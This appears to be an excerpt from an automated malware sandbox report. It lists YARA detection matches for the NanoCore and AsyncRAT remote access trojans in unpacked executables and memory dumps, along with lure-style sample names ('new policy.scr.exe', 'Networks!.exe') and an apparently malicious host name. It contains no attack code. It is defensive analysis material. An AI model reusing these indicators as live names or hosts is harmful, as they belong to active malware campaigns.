Source: 2.0.airlineagancy.casacam.net 7076.exe.280000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.new policy.scr.exe.3252f80.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000002.00000000.1859765201.0000000000282000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000009.00000002.2363417540.0000000003E7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
